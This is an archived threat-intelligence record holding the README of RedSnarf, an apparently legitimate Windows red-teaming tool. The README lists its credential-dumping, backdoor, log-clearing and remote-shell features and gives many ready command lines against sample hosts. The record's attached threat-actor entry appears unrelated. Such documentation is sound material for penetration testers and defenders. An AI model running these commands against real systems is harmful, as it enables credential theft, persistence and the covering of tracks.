{
	"id": "c2f63d78-37f9-4950-a672-3855249f84af",
	"created_at": "2026-04-06T00:19:14.91705Z",
	"updated_at": "2026-04-10T03:24:30.059764Z",
	"deleted_at": null,
	"sha1_hash": "e6c5983a62ea3d0158df92be03b94e3d68f49c8e",
	"title": "GitHub - nccgroup/redsnarf: RedSnarf is a pen-testing / red-teaming tool for Windows environments",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 62388,
	"plain_text": "GitHub - nccgroup/redsnarf: RedSnarf is a pen-testing / red-teaming tool for Windows environments\r\nBy llandeilocymro\r\nArchived: 2026-04-05 13:57:29 UTC\r\n ______ .____________ _____\r\n\\______ \\ ____ __| _/ _____/ ____ _____ ________/ ____\\\r\n | _// __ \\ / __ |\\_____ \\ / \\\\__ \\\\_ __ \\ __\\\r\n | | \\ ___// /_/ |/ \\ | \\/ __ \\| | \\/| |\r\n |____|_ /\\___ \u003e____ /_______ /___| (____ /__| |__|\r\n \\/ \\/ \\/ \\/ \\/ \\/\r\n redsnarf.ff0000@gmail.com\r\n @redsnarf\r\nlicense Apache-2.0\r\nRedSnarf is a pen-testing / red-teaming tool by Ed Williams for retrieving hashes and credentials from Windows workstations, servers and domain controllers using OpSec Safe Techniques.\r\nSee our YouTube Channel for Videos https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ\r\nRedSnarf functionality includes:\r\n• Retrieval of local SAM hashes\r\n• Enumeration of users running with elevated system privileges and their corresponding LSA secrets passwords;\r\n• Retrieval of MS cached credentials;\r\n• Pass-the-hash;\r\n• Quickly identify weak and guessable username/password combinations (default of administrator/Password01);\r\n• The ability to retrieve hashes across a range;\r\n• Hash spraying - the credsfile will accept a mix of pwdump, fgdump and plain text username and password separated by a space;\r\n• Lsass dump for offline analysis with Mimikatz;\r\n• Dumping of Domain Controller hashes using NTDSUtil and retrieval of NTDS.dit for local parsing;\r\n• Dumping of Domain Controller hashes using the drsuapi method;\r\n• Retrieval of the Scripts and Policies folders from a Domain Controller and parsing for 'password' and 'administrator';\r\n• Ability to decrypt cpassword hashes;\r\n• Ability to start a shell on a remote machine;\r\n• The ability to clear the event logs (application, security, setup or system); (Internal Version only)\r\n• Results are saved on a per-host basis for analysis.\r\n• Enable/Disable RDP on a remote machine.\r\nhttps://github.com/nccgroup/redsnarf\r\nPage 1 of 6\n\n• Change RDP port from 3389 to 443 on a remote machine.\r\n• Enable/Disable NLA on a remote machine.\r\n• Find where users are logged in on remote machines.\r\n• Backdoor Windows Logon Screen\r\n• Enable/Disable UAC on a remote machine.\r\n• Stealth mimikatz added.\r\n• Parsing of domain hashes\r\n• Ability to determine which accounts are enabled/disabled\r\n• Take a screenshot of a remote logged-on active user's desktop\r\n• Record a remote logged-on active user's desktop\r\n• Decrypt Windows CPassword\r\n• Decrypt WinSCP Password\r\n• Get User SPNs\r\n• Retrieve Wi-Fi passwords from remote machines\r\nRedSnarf Usage\r\nRequirements:\r\nImpacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git\r\nCredDump7 - https://github.com/Neohapsis/creddump7\r\nLsass Retrieval using procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx\r\nNetaddr (0.7.12) - pip install netaddr\r\nTermcolor (1.1.0) - pip install termcolor\r\niconv - used when parsing Mimikatz info locally\r\nShow Help\r\n./redsnarf.py -h\r\n./redsnarf.py --help\r\nRetrieve Local Hashes\r\nRetrieve Local Hashes from a single machine using weak local credentials and clearing the Security event log\r\n./redsnarf.py -H ip=10.0.0.50 -uC security\r\nRetrieve Local Hashes from a single machine using weak local credentials and clearing the Application event log\r\n./redsnarf.py -H ip=10.0.0.50 -uC application\r\nRetrieve Local Hashes from a single machine using local administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .\r\nRetrieve Local Hashes from a single machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com\r\nRetrieve Hashes across a network range using local administrator credentials\r\n./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .\r\nRetrieve Hashes across a network range using domain administrator credentials\r\n./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com\r\nRetrieve Hashes from a file of targets using domain administrator credentials\r\n./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com\r\nHash Spraying\r\nSpray Hashes across a network range\r\n./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .\r\nRetrieve Hashes across a network range using a domain login\r\n./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com\r\nQuickly Check Credentials\r\n./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y\r\nQuickly Check a File containing usernames (-hS) against a generic password (-hP)\r\n./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y\r\nRetrieve Domain Hashes\r\nRetrieve Hashes using the drsuapi method (Quickest)\r\nThis method supports an optional flag of -q y which will query LDAP and output whether accounts are live or disabled\r\n./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)\r\nRetrieve Hashes using NTDSUtil\r\nThis method supports an optional flag of -q y which will query LDAP and output whether accounts are live or disabled\r\n./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)\r\nGolden Ticket Generation\r\n./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y\r\nInformation Gathering\r\nCopy the Policies and Scripts folders from a Domain Controller and parse for password and administrator\r\n./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y\r\nDecrypt Cpassword\r\n./redsnarf.py -uG cpassword\r\nFind User - Live\r\n./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name\r\nFind User - Offline (searches previously downloaded information)\r\n./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name\r\nDisplay NT AUTHORITY\\SYSTEM Tasklist\r\n./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y\r\nScreenshot the Desktop of a Remote Logged-on Active User\r\n./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y\r\nMisc\r\nStart a Shell on a machine using local administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y\r\nStart a Shell on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y\r\nRetrieve a copy of lsass for offline parsing with Mimikatz on a machine using local administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y\r\nRun stealth mimikatz. This option starts a web server to serve a PowerShell script, which is obfuscated and encoded machine side; data doesn't touch disk. Credentials are grepped for in an easy-to-read style and echoed back to the screen.\r\n./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y\r\nRun Custom Command\r\nExample 1\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'\r\nExample 2 - Double quotes need to be escaped with \\\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name \"domain admins\" | dsget group -members -expand'\r\nLocal Access Token Policy\r\nCreates a batch file, lat.bat, which you can copy to the remote machine and execute; it modifies the registry to either enable or disable the Local Access Token Policy setting.\r\n./redsnarf.py -rL y\r\nWdigest\r\nEnable the UseLogonCredential Wdigest registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e\r\nDisable the UseLogonCredential Wdigest registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d\r\nQuery the UseLogonCredential Wdigest registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q\r\nUAC\r\nEnable the UAC registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e\r\nDisable the UAC registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d\r\nQuery the UAC registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q\r\nBackdoor - Backdoor Windows Screen - Press Left Shift + Left Alt + Print Screen to activate\r\nEnable the Backdoor registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e\r\nDisable the Backdoor registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d\r\nQuery the Backdoor registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q\r\nAutoLogon\r\nEnable the Windows AutoLogon registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e\r\nDisable the Windows AutoLogon registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d\r\nQuery the Windows AutoLogon registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q\r\nLock a remote machine user session using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y\r\nRDP\r\nEnable RDP on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e\r\nDisable RDP on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d\r\nQuery RDP status on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q\r\nChange RDP Port from 3389 to 443 - Change RDP Port to 443 on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e\r\nChange RDP Port to the default of 3389 on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d\r\nQuery RDP Port Value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q\r\nEnable Multi-RDP with Mimikatz\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y\r\nEnable RDP SingleSessionPerUser on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e\r\nDisable RDP SingleSessionPerUser on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d\r\nQuery RDP SingleSessionPerUser status on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q\r\nNLA\r\nEnable NLA on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e\r\nDisable NLA on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d\r\nQuery NLA status on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q\r\nSource: https://github.com/nccgroup/redsnarf",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://github.com/nccgroup/redsnarf"
	],
	"report_names": [
		"redsnarf"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434754,
	"ts_updated_at": 1775791470,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e6c5983a62ea3d0158df92be03b94e3d68f49c8e.pdf",
		"text": "https://archive.orkl.eu/e6c5983a62ea3d0158df92be03b94e3d68f49c8e.txt",
		"img": "https://archive.orkl.eu/e6c5983a62ea3d0158df92be03b94e3d68f49c8e.jpg"
	}
}